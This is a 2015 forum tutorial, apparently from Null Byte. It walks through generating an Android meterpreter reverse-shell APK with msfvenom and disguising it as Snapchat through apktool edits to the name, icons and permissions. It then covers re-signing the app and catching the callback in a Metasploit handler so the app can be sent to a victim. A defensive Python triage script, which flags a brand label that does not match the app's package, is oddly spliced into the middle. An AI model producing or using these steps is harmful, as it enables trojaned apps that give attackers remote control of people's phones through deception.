How to Make Your Malicious Android App Be More Convincing.

Aug 9, 2015 09:42 PM
Aug 10, 2015 07:54 PM

Well hello dear readers of Null Byte,

Let me start off by stating that English is not my first language, so there will be some grammar mistakes. This is also my first tutorial, so don't hesitate to give me feedback :)

You may have made a malicious APK (Android package) on Kali before; it is done the same way you make a malicious exe, with msfvenom.

In this short tutorial I will show you how to change the icon, permissions, and name of the app to make it more convincing for your victim, something which can be very relevant when you are social engineering someone.

Step 1: Making the Malicious Apk

So, let's start off by making our meterpreter APK. Enter this code in the terminal:

msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk

This will create app.apk in your current folder.

Now comes the hard part.

Step 2: Installing Apktool

You will need to install Apktool on your system. I used Windows for this, but it should be done the same way on Linux/Mac OS. Since this is different for everybody, I won't cover installing this tool. Check out their website for your system.

Do note that Apktool is installed by default in the reverse engineering toolkit from Kali Linux!

Step 3: Decompiling Your Apk

First check if you can run apktool properly by running the command:

apktool

If you get the help menu, everything is installed correctly. Now run the command:

apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder

apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files, most likely:

  • The 'res' folder
  • The AndroidManifest.xml file
  • The 'smali' folder
  • The 'original' folder
  • The apktool.yml file

Step 4: Modifying the Files

For this tutorial we are only going to modify the AndroidManifest.xml file and the 'res' folder. First off, open the AndroidManifest.xml with your preferred text editor. I am using Notepad++.

You will see something like this:

[Screenshot: AndroidManifest.xml open in the text editor]

First off, let's delete a few lines that we will probably not need and that would give the user an extra warning.

Since Null Byte messes with symbols, here is a pastebin with what to do.

You're back? Great.

Now we are going into the 'res' folder. Here you will find the 'values' folder; go into it. You will find 2 files there, one of them named strings.xml. Once again, open this XML file with your preferred text editor.

You will find the line MainActivity

Change 'MainActivity' to your preferred app name. I chose the name 'Snapchat', but choose a name which you see fit for your situation.

Save the file and go back up to the /res/ folder.

Create 3 folders named:

  • drawable-ldpi-v4
  • drawable-mdpi-v4
  • drawable-hdpi-v4

You will now need to find an appropriate icon set for your app.

I used the websites Android Asset Studio and resizeimage.net.

The goal is to get 3 png files of the following sizes:

  • 36x36 (pixels) for the ldpi folder
  • 48x48 for the mdpi folder
  • 72x72 for the hdpi folder

Name these png files all 'icon.png' and place them in the appropriate folder.
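From the defender's side, the rename in this step leaves a mismatch that triage can check: the label in res/values/strings.xml claims a well-known brand while the package attribute in AndroidManifest.xml does not belong to that brand. The sketch below is an added example, not part of the original tutorial; the allowlist entry, the string name app_name and the sample files are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Assumption: a defender-maintained allowlist mapping brand label -> genuine package.
KNOWN_BRANDS = {"snapchat": "com.snapchat.android"}

# Constructed sample input shaped like apktool-decoded files (not taken from the page).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.placeholder">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="@string/app_name">
    <activity android:name=".MainActivity" android:label="@string/app_name"/>
  </application>
</manifest>"""
SAMPLE_STRINGS = '<resources><string name="app_name">Snapchat</string></resources>'


def resolve_label(raw, strings):
    """Resolve an @string/ reference using the entries of res/values/strings.xml."""
    if raw and raw.startswith("@string/"):
        return strings.get(raw[len("@string/"):], raw)
    return raw or ""


def triage(manifest_xml, strings_xml):
    """Return (package, label, permissions, findings) for one decoded APK."""
    manifest = ET.fromstring(manifest_xml)
    strings = {s.get("name"): s.text or "" for s in ET.fromstring(strings_xml).iter("string")}
    package = manifest.get("package", "")
    app = manifest.find("application")
    raw_label = app.get(ANDROID_NS + "label") if app is not None else None
    label = resolve_label(raw_label, strings)
    perms = [p.get(ANDROID_NS + "name") for p in manifest.iter("uses-permission")]
    findings = []
    expected = KNOWN_BRANDS.get(label.strip().lower())
    if expected and package != expected:
        findings.append(f"label {label!r} belongs to {expected!r} but package is {package!r}")
    return package, label, perms, findings


if __name__ == "__main__":
    pkg, label, perms, findings = triage(SAMPLE_MANIFEST, SAMPLE_STRINGS)
    print(f"package={pkg} label={label} permissions={perms}")
    for finding in findings:
        print("FINDING:", finding)
```

Treat a clean result as inconclusive and also compare the signing certificate with the genuine publisher's.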

Step 5: Compiling Your App

This process is very straightforward. Go back to the apktool terminal and enter the following command:

apktool b /pathtoyourfolder/folder

This will create an apk in the newly created 'dist' folder (found in /pathtoyourfolder/folder).

You thought we were done? Almost, just one more step.

Step 6: Signing the Apk

Here is a zip used for signing: original thread, direct link, or, if that doesn't work, this mega.co.nz link. Unzip the file and cd into the new folder, now use the command:

java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk

This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.

Step 7: Listening for the Connection

Now for the final part. Open up Metasploit using:

msfconsole

Open multi/handler

use multi/handler

set the payload

set payload

android/meterpreter/reversetcp


set LHOST and LPORT

set LPORT (your port)

set LHOST (your host)


and exploit

exploit

Now once they open up the app, you will get an incoming meterpreter shell. Sweet, right?

I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.

-Bart
